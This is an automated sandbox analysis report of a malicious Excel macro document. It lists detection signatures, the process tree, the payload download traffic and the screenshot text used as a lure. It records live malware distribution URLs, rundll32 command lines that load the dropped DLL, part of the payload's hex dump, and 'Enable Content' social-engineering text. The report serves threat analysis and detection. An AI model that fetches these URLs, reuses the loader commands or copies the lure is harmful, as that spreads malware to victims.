Loading ...

Play interactive tourEdit tour

Windows Analysis Report sin t#U00edtulo_0212.xlsm

Overview

General Information

Sample Name:sin t#U00edtulo_0212.xlsm
Analysis ID:532947
MD5:382f6c1c7508996537bfd33fc5e884af
SHA1:5143a3cce279c8e70c7a2aa366a78b2583de9025
SHA256:5d0311243534a50b4fffa6bb32a952f86e51194d372741b30dbea12c51eb4c44
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • rundll32.exe (PID: 2996 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 1172 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • rundll32.exe (PID: 200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • svchost.exe (PID: 2128 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2580, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241, ProcessId: 2996

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: sin t#U00edtulo_0212.xlsmVirustotal: Detection: 22%Perma Link
    Antivirus detection for URL or domainShow sources
    Source: http://www.duoyuhudong.cn/wp-content/we8xi/ooC:Avira URL Cloud: Label: malware
    Source: http://www.duoyuhudong.cn/wp-content/we8xi/TAvira URL Cloud: Label: malware
    Source: http://www.duoyuhudong.cn/wp-content/we8xi/RAvira URL Cloud: Label: malware
    Source: http://www.duoyuhudong.cn/wp-content/we8xi/Avira URL Cloud: Label: malware
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E46B531 FindFirstFileExA,

    Software Vulnerabilities:

    barindex
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: Z8LJs4fFM8[1].dll.0.drJump to dropped file
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dllJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global trafficDNS query: name: sadabahar.com.np
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.8.1Date: Thu, 02 Dec 2021 20:22:20 GMTContent-Type: application/x-msdownloadContent-Length: 460288Connection: keep-aliveX-Powered-By: PHP/7.2.15Set-Cookie: 61a92afcad18b=1638476540; expires=Thu, 02-Dec-2021 20:23:20 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Thu, 02 Dec 2021 20:22:20 GMTExpires: Thu, 02 Dec 2021 20:22:20 GMTContent-Disposition: attachment; filename="Z8LJs4fFM8.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 0d e9 1a ec 6c 87 49 ec 6c 87 49 ec 6c 87 49 9f 0e 84 48 e1 6c 87 49 9f 0e 82 48 71 6c 87 49 9f 0e 83 48 fa 6c 87 49 be 19 82 48 bf 6c 87 49 be 19 83 48 fc 6c 87 49 be 19 84 48 fb 6c 87 49 9f 0e 81 48 ef 6c 87 49 9f 0e 86 48 fd 6c 87 49 ec 6c 86 49 37 6c 87 49 59 19 8e 48 e3 6c 87 49 59 19 87 48 ed 6c 87 49 59 19 78 49 ed 6c 87 49 ec 6c 10 49 ed 6c 87 49 59 19 85 48 ed 6c 87 49 52 69 63 68 ec 6c 87 49 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 ff a8 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 76 03 00 00 9a 03 00 00 00 00 00 4e 4b 01 00 00 10 00 00 00 90 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 07 00 00 04 00 00 a1 2d 07 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 91 04 00 a0 08 00 00 50 9a 04 00 b4 00 00 00 00 e0 04 00 48 2a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 bc 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 56 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 03 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 75 03 00 00 10 00 00 00 76 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 1a 01 00 00 90 03 00 00 1c 01 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 23 00 00 00 b0 04 00 00 16 00 00 00 96 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 2a 02 00 00 e0 04 00 00 2c 02 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 2c 00 00 00 10 07 00 00 2e 00 00 00 d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
    Source: global trafficHTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.25content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Thu, 02 Dec 2021 20:22:19 GMTserver: LiteSpeedData Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87
    Source: EXCEL.EXE, 00000000.00000002.761699674.000000000598F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537570017.000000000598F000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/l equals www.linkedin.com (Linkedin)
    Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: EXCEL.EXE, 00000000.00000002.761699674.000000000598F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537570017.000000000598F000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.c
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.co
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.n
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/w
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-i
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-inc
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-inclu
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
    Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
    Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmpString found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/
    Source: EXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
    Source: EXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
    Source: EXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
    Source: EXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
    Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmpString found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/R
    Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmpString found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/T
    Source: EXCEL.EXE, 00000000.00000002.750052025.000000000051C000.00000004.00000020.sdmpString found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/ooC:
    Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30817388.pngJump to behavior
    Source: unknownDNS traffic detected: queries for: sadabahar.com.np
    Source: global trafficHTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E445E70 GetOpenClipboardWindow,GetDesktopWindow,GetCurrentThreadId,GetUserDefaultUILanguage,GetProcessWindowStation,GetUserDefaultUILanguage,GetEnvironmentStringsW,GetProcessWindowStation,

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
    Source: Screenshot number: 4Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
    Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 0Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" button
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 1Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" button
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Nrenernv\Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6340
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6753
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66E8
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E66F3
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018562B
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019E05C
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018601A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00191E11
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00199209
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019C400
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019AC3D
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019EC30
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019CE32
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018A833
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00193C28
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018A02A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018C227
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00198851
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00194E55
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019D454
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018F443
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019C879
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001A0E72
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00184871
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00196A6B
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00190660
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001A1E60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019988A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019D88A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00195C8A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00189082
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019B2B8
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001940BB
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001922BB
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00191ABD
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00190AA8
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B0AC
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00193AA0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019C6D9
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001970D1
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018E6CA
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B8CA
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00195ECA
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018D2C4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00181EC4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001956F8
